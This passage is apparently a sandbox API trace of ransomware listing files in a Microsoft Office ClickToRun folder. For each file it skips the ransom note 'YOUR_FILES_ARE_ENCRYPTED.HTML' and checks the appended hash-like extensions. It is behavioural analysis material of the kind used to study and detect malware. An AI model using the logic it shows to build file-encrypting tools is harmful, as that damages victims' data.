pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.63EDB90223550D3E17FFCC8D3E38E6D7888D9EB7A5EDA6A20DCF7A1E86A0356B") returned 186 [0169.631] lstrcmpW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml.63EDB90223550D3E17FFCC8D3E38E6D7888D9EB7A5EDA6A20DCF7A1E86A0356B", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.631] PathFindExtensionW (pszPath="C2RManifest.groovemui.msi.16.en-us.xml.63EDB90223550D3E17FFCC8D3E38E6D7888D9EB7A5EDA6A20DCF7A1E86A0356B") returned=".63EDB90223550D3E17FFCC8D3E38E6D7888D9EB7A5EDA6A20DCF7A1E86A0356B" [0169.631] lstrlenW (lpString=".63EDB90223550D3E17FFCC8D3E38E6D7888D9EB7A5EDA6A20DCF7A1E86A0356B") returned 65 [0169.631] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e6f910, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e6f910, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb500320, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x15dd6, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.928855FAC863A5A274AD5647EACF0DBEA604FA8257C85E77997382FC3561CB7C", cAlternateFileName="C2RMAN~1.928")) returned 1 [0169.631] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.928855FAC863A5A274AD5647EACF0DBEA604FA8257C85E77997382FC3561CB7C") returned 194 [0169.631] lstrcmpW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.928855FAC863A5A274AD5647EACF0DBEA604FA8257C85E77997382FC3561CB7C", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.631] PathFindExtensionW (pszPath="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.928855FAC863A5A274AD5647EACF0DBEA604FA8257C85E77997382FC3561CB7C") returned=".928855FAC863A5A274AD5647EACF0DBEA604FA8257C85E77997382FC3561CB7C" [0169.631] lstrlenW (lpString=".928855FAC863A5A274AD5647EACF0DBEA604FA8257C85E77997382FC3561CB7C") returned 65 [0169.631] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e497b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e497b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb526480, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x5b20, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.lyncmui.msi.16.en-us.xml.0BD15275936906A5EC09871AF57E4AEBB4B066246C20AB0889C1285456519D63", cAlternateFileName="C2RMAN~1.0BD")) returned 1 [0169.631] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.0BD15275936906A5EC09871AF57E4AEBB4B066246C20AB0889C1285456519D63") returned 184 [0169.631] lstrcmpW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml.0BD15275936906A5EC09871AF57E4AEBB4B066246C20AB0889C1285456519D63", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.631] PathFindExtensionW (pszPath="C2RManifest.lyncmui.msi.16.en-us.xml.0BD15275936906A5EC09871AF57E4AEBB4B066246C20AB0889C1285456519D63") returned=".0BD15275936906A5EC09871AF57E4AEBB4B066246C20AB0889C1285456519D63" [0169.632] lstrlenW (lpString=".0BD15275936906A5EC09871AF57E4AEBB4B066246C20AB0889C1285456519D63") returned 65 [0169.632] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e497b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e497b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb54c5e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x1a182, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.officemui.msi.16.en-us.xml.1F2EF13709D55AF692C0D997C18B8891936D170276AC93C70B343B9F2D06D303", cAlternateFileName="C2RMAN~1.1F2")) returned 1 [0169.632] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.1F2EF13709D55AF692C0D997C18B8891936D170276AC93C70B343B9F2D06D303") returned 186 [0169.632] lstrcmpW (lpString1="C2RManifest.officemui.msi.16.en-us.xml.1F2EF13709D55AF692C0D997C18B8891936D170276AC93C70B343B9F2D06D303", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.632] PathFindExtensionW (pszPath="C2RManifest.officemui.msi.16.en-us.xml.1F2EF13709D55AF692C0D997C18B8891936D170276AC93C70B343B9F2D06D303") returned=".1F2EF13709D55AF692C0D997C18B8891936D170276AC93C70B343B9F2D06D303" [0169.632] lstrlenW (lpString=".1F2EF13709D55AF692C0D997C18B8891936D170276AC93C70B343B9F2D06D303") returned 65 [0169.632] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e23650, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e23650, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb572740, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.officemuiset.msi.16.en-us.xml.8281294C5F1B89E3B7B713633CD4E825FEEE45FCCFDC81A652DC2DCB7DC84F41", cAlternateFileName="C2RMAN~1.828")) returned 1 [0169.632] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.8281294C5F1B89E3B7B713633CD4E825FEEE45FCCFDC81A652DC2DCB7DC84F41") returned 189 [0169.632] lstrcmpW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml.8281294C5F1B89E3B7B713633CD4E825FEEE45FCCFDC81A652DC2DCB7DC84F41", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.632] PathFindExtensionW (pszPath="C2RManifest.officemuiset.msi.16.en-us.xml.8281294C5F1B89E3B7B713633CD4E825FEEE45FCCFDC81A652DC2DCB7DC84F41") returned=".8281294C5F1B89E3B7B713633CD4E825FEEE45FCCFDC81A652DC2DCB7DC84F41" [0169.633] lstrlenW (lpString=".8281294C5F1B89E3B7B713633CD4E825FEEE45FCCFDC81A652DC2DCB7DC84F41") returned 65 [0169.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e23650, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e23650, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb7adbe0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x176c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.F59A29784F8D60288138BDAA32788ACEB64A8152A1E65FBA65AAFC1FBB9C982D", cAlternateFileName="C2RMAN~1.F59")) returned 1 [0169.633] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.F59A29784F8D60288138BDAA32788ACEB64A8152A1E65FBA65AAFC1FBB9C982D") returned 200 [0169.633] lstrcmpW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.F59A29784F8D60288138BDAA32788ACEB64A8152A1E65FBA65AAFC1FBB9C982D", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.633] PathFindExtensionW (pszPath="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.F59A29784F8D60288138BDAA32788ACEB64A8152A1E65FBA65AAFC1FBB9C982D") returned=".F59A29784F8D60288138BDAA32788ACEB64A8152A1E65FBA65AAFC1FBB9C982D" [0169.633] lstrlenW (lpString=".F59A29784F8D60288138BDAA32788ACEB64A8152A1E65FBA65AAFC1FBB9C982D") returned 65 [0169.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dfd4f0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dfd4f0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb6ef500, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x4a1a, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.onenotemui.msi.16.en-us.xml.1693D172FBC5F146785C988C6560B0FCD4A0177C5482CCF2E4A143A646090E0B", cAlternateFileName="C2RMAN~1.169")) returned 1 [0169.633] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.1693D172FBC5F146785C988C6560B0FCD4A0177C5482CCF2E4A143A646090E0B") returned 187 [0169.633] lstrcmpW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml.1693D172FBC5F146785C988C6560B0FCD4A0177C5482CCF2E4A143A646090E0B", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.633] PathFindExtensionW (pszPath="C2RManifest.onenotemui.msi.16.en-us.xml.1693D172FBC5F146785C988C6560B0FCD4A0177C5482CCF2E4A143A646090E0B") returned=".1693D172FBC5F146785C988C6560B0FCD4A0177C5482CCF2E4A143A646090E0B" [0169.633] lstrlenW (lpString=".1693D172FBC5F146785C988C6560B0FCD4A0177C5482CCF2E4A143A646090E0B") returned 65 [0169.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb60acc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x5ee, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.563ACA39ED0F9FC6D5DFC7CF54A945AA295C57DA3610076BEB767FDE85333359", cAlternateFileName="C2RMAN~1.563")) returned 1 [0169.633] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.563ACA39ED0F9FC6D5DFC7CF54A945AA295C57DA3610076BEB767FDE85333359") returned 192 [0169.633] lstrcmpW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.563ACA39ED0F9FC6D5DFC7CF54A945AA295C57DA3610076BEB767FDE85333359", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.633] PathFindExtensionW (pszPath="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.563ACA39ED0F9FC6D5DFC7CF54A945AA295C57DA3610076BEB767FDE85333359") returned=".563ACA39ED0F9FC6D5DFC7CF54A945AA295C57DA3610076BEB767FDE85333359" [0169.633] lstrlenW (lpString=".563ACA39ED0F9FC6D5DFC7CF54A945AA295C57DA3610076BEB767FDE85333359") returned 65 [0169.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb715660, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x2b14, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.osmmui.msi.16.en-us.xml.5715D7DADDEACB778C52C73CF0FF1147E3573A45063BADC2D3F779E16D112233", cAlternateFileName="C2RMAN~1.571")) returned 1 [0169.633] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.5715D7DADDEACB778C52C73CF0FF1147E3573A45063BADC2D3F779E16D112233") returned 183 [0169.633] lstrcmpW (lpString1="C2RManifest.osmmui.msi.16.en-us.xml.5715D7DADDEACB778C52C73CF0FF1147E3573A45063BADC2D3F779E16D112233", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.633] PathFindExtensionW (pszPath="C2RManifest.osmmui.msi.16.en-us.xml.5715D7DADDEACB778C52C73CF0FF1147E3573A45063BADC2D3F779E16D112233") returned=".5715D7DADDEACB778C52C73CF0FF1147E3573A45063BADC2D3F779E16D112233" [0169.633] lstrlenW (lpString=".5715D7DADDEACB778C52C73CF0FF1147E3573A45063BADC2D3F779E16D112233") returned 65 [0169.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb73b7c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x8fa, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.37D8AE5D9E043E04B0F06ACDB780EC47802FF6274B1F40F4AE8547AC9670FB36", cAlternateFileName="C2RMAN~1.37D")) returned 1 [0169.633] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.37D8AE5D9E043E04B0F06ACDB780EC47802FF6274B1F40F4AE8547AC9670FB36") returned 196 [0169.633] lstrcmpW (lpString1="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.37D8AE5D9E043E04B0F06ACDB780EC47802FF6274B1F40F4AE8547AC9670FB36", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.633] PathFindExtensionW (pszPath="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.37D8AE5D9E043E04B0F06ACDB780EC47802FF6274B1F40F4AE8547AC9670FB36") returned=".37D8AE5D9E043E04B0F06ACDB780EC47802FF6274B1F40F4AE8547AC9670FB36" [0169.633] lstrlenW (lpString=".37D8AE5D9E043E04B0F06ACDB780EC47802FF6274B1F40F4AE8547AC9670FB36") returned 65 [0169.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb761920, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x2698, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.osmuxmui.msi.16.en-us.xml.4F8FE545ECB94E3A3FCB02BCC440DAE73AB0FF16CAC3B7AFD3E1FF888348E927", cAlternateFileName="C2RMAN~1.4F8")) returned 1 [0169.633] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.4F8FE545ECB94E3A3FCB02BCC440DAE73AB0FF16CAC3B7AFD3E1FF888348E927") returned 185 [0169.633] lstrcmpW (lpString1="C2RManifest.osmuxmui.msi.16.en-us.xml.4F8FE545ECB94E3A3FCB02BCC440DAE73AB0FF16CAC3B7AFD3E1FF888348E927", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.634] PathFindExtensionW (pszPath="C2RManifest.osmuxmui.msi.16.en-us.xml.4F8FE545ECB94E3A3FCB02BCC440DAE73AB0FF16CAC3B7AFD3E1FF888348E927") returned=".4F8FE545ECB94E3A3FCB02BCC440DAE73AB0FF16CAC3B7AFD3E1FF888348E927" [0169.634] lstrlenW (lpString=".4F8FE545ECB94E3A3FCB02BCC440DAE73AB0FF16CAC3B7AFD3E1FF888348E927") returned 65 [0169.634] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92dd7390, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92dd7390, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb761920, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x16c9a, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.8C735527B3FD0520B7CCD2947806494DB64239F9427227ADB8D09FB311E2497B", cAlternateFileName="C2RMAN~1.8C7")) returned 1 [0169.634] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.8C735527B3FD0520B7CCD2947806494DB64239F9427227ADB8D09FB311E2497B") returned 200 [0169.634] lstrcmpW (lpString1="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.8C735527B3FD0520B7CCD2947806494DB64239F9427227ADB8D09FB311E2497B", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.634] PathFindExtensionW (pszPath="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.8C735527B3FD0520B7CCD2947806494DB64239F9427227ADB8D09FB311E2497B") returned=".8C735527B3FD0520B7CCD2947806494DB64239F9427227ADB8D09FB311E2497B" [0169.634] lstrlenW (lpString=".8C735527B3FD0520B7CCD2947806494DB64239F9427227ADB8D09FB311E2497B") returned 65 [0169.634] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92db1230, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92db1230, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb630e20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x178c4, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.outlookmui.msi.16.en-us.xml.51BE11C64767BC90CEA6861EE065004515107E8BDF4D9818A920AE838B88F51E", cAlternateFileName="C2RMAN~1.51B")) returned 1 [0169.634] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.51BE11C64767BC90CEA6861EE065004515107E8BDF4D9818A920AE838B88F51E") returned 187 [0169.634] lstrcmpW (lpString1="C2RManifest.outlookmui.msi.16.en-us.xml.51BE11C64767BC90CEA6861EE065004515107E8BDF4D9818A920AE838B88F51E", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.634] PathFindExtensionW (pszPath="C2RManifest.outlookmui.msi.16.en-us.xml.51BE11C64767BC90CEA6861EE065004515107E8BDF4D9818A920AE838B88F51E") returned=".51BE11C64767BC90CEA6861EE065004515107E8BDF4D9818A920AE838B88F51E" [0169.634] lstrlenW (lpString=".51BE11C64767BC90CEA6861EE065004515107E8BDF4D9818A920AE838B88F51E") returned 65 [0169.634] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92db1230, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92db1230, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb656f80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0xadce8, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.741B0DFEC9162FB89ED607D6E6498CBE755527298847CC4DF4BC7EEC5DF1BA1B", cAlternateFileName="C2RMAN~1.741")) returned 1 [0169.634] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.741B0DFEC9162FB89ED607D6E6498CBE755527298847CC4DF4BC7EEC5DF1BA1B") returned 206 [0169.634] lstrcmpW (lpString1="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.741B0DFEC9162FB89ED607D6E6498CBE755527298847CC4DF4BC7EEC5DF1BA1B", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.634] PathFindExtensionW (pszPath="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.741B0DFEC9162FB89ED607D6E6498CBE755527298847CC4DF4BC7EEC5DF1BA1B") returned=".741B0DFEC9162FB89ED607D6E6498CBE755527298847CC4DF4BC7EEC5DF1BA1B" [0169.634] lstrlenW (lpString=".741B0DFEC9162FB89ED607D6E6498CBE755527298847CC4DF4BC7EEC5DF1BA1B") returned 65 [0169.634] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d3ee10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d3ee10, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb7d3d40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x19170, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.65529E645C2F9DBD85AD705F2684EA134C32B62FCAC028F763EFBED48A6D9035", cAlternateFileName="C2RMAN~1.655")) returned 1 [0169.634] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.65529E645C2F9DBD85AD705F2684EA134C32B62FCAC028F763EFBED48A6D9035") returned 206 [0169.634] lstrcmpW (lpString1="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.65529E645C2F9DBD85AD705F2684EA134C32B62FCAC028F763EFBED48A6D9035", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.634] PathFindExtensionW (pszPath="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.65529E645C2F9DBD85AD705F2684EA134C32B62FCAC028F763EFBED48A6D9035") returned=".65529E645C2F9DBD85AD705F2684EA134C32B62FCAC028F763EFBED48A6D9035" [0169.634] lstrlenW (lpString=".65529E645C2F9DBD85AD705F2684EA134C32B62FCAC028F763EFBED48A6D9035") returned 65 [0169.634] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb846160, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x684e, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.powerpointmui.msi.16.en-us.xml.C7E0D3355E5450DDC35D0B4E202D5FCBA0D3F1485F01725A4FBBF20A63B4B854", cAlternateFileName="C2RMAN~1.C7E")) returned 1 [0169.634] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.C7E0D3355E5450DDC35D0B4E202D5FCBA0D3F1485F01725A4FBBF20A63B4B854") returned 190 [0169.634] lstrcmpW (lpString1="C2RManifest.powerpointmui.msi.16.en-us.xml.C7E0D3355E5450DDC35D0B4E202D5FCBA0D3F1485F01725A4FBBF20A63B4B854", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.634] PathFindExtensionW (pszPath="C2RManifest.powerpointmui.msi.16.en-us.xml.C7E0D3355E5450DDC35D0B4E202D5FCBA0D3F1485F01725A4FBBF20A63B4B854") returned=".C7E0D3355E5450DDC35D0B4E202D5FCBA0D3F1485F01725A4FBBF20A63B4B854" [0169.634] lstrlenW (lpString=".C7E0D3355E5450DDC35D0B4E202D5FCBA0D3F1485F01725A4FBBF20A63B4B854") returned 65 [0169.635] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb846160, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x636e, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Proof.Culture.msi.16.en-us.xml.B98DE14DADA0FB248C2D77D7C55C3F184CDBA83B5540A571FE29C17FD6132C00", cAlternateFileName="C2RMAN~1.B98")) returned 1 [0169.635] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, 